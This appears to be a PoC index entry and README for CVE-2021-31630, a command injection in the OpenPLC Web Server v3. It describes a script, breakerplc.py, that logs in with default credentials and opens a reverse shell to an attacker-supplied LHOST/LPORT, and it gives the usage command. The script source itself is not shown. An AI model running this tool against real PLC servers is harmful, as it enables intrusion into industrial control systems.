CVE-2021-31630 PoC — OpenPLC 代码注入漏洞

Source

Associated Vulnerability

Description

This is a automation of cve-2021-31630 exploitation

Readme

This script automatically exploits vulnerability in OpenPLC Web Server v3

You will be able to create an automatic Rever Shell with the server without having to use manual techniques.

CVE-2021-31630 Detail
Command Injection in Open PLC Webserver v3 allows remote attackers to execute arbitrary code via the "Hardware Layer Code Box" component on the "/hardware" page of the application.

*The script was customized so that after completing the script registration in OpenPLC, it generates the machine's shell in the same terminal.*

Use the command below (We recommend creating a Python virtual environment to install as dependencies) # However, the breakerplc.py script must be executed outside the virtual environment.
```
sudo apt update
pip3 install requests

```
How to use? you can use these command line (Below).

```
python breakerplc.py -lh <your local ip> -lp 4444 <http://machine ip:8080> -u openplc -p openplc

```
```
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url

positional arguments:
  url         Target URL with http(s)://

options:
  -h, --help  show this help message and exit
  -u U        Username
  -p P        Password
  -t T        Request Timeout, increase if server is slow
  -lh LH      LHOST
  -lp LP      LPORT

  ```
![2024-06-21 19-53-25](https://github.com/adibabdala123/cve-2021-31630/assets/76139191/74cc2df6-17bf-4488-9e44-9c3c39ec6d80)

**IMPORTANT** 
After connecting, you need to write "whoami" or "ls" to break the line of code and return the shell.
![image](https://github.com/adibabdala123/cve-2021-31630/assets/76139191/b2176031-1b05-4fd5-b975-2fc6a18ede5e)

File Snapshot

 [4.0K]  /data/pocs/08ec8f11df017a0e372f1eabdf8b6d4e39933d30
├── [7.0K]  breakerplc.py
└── [1.6K]  README.md

0 directories, 2 files

Remarks